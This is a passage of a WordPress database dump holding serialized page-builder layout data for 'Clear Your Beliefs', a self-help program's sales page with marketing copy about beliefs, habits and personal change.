go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:15:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:21:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}}}'),
(1533, 1976, 'panels_data', 'a:3:{s:7:"widgets";a:23:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:3:{s:3:"src";s:79:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:159:"<div class="parg-text"><p>Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"1";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:482:"<div class="parg-text"><p><strong>We literally <u>create our reality</u> with our beliefs.</strong></p><p>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:3:{s:3:"src";s:64:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"1";s:2:"id";s:2:"21";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:1000:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright"></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:17:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"2";}i:15;a:1:{s:5:"cells";s:1:"2";}i:16;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:25:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"14";}i:22;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"15";}i:23;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"15";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1535, 1977, 'panels_data', 'a:3:{s:7:"widgets";a:23:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your 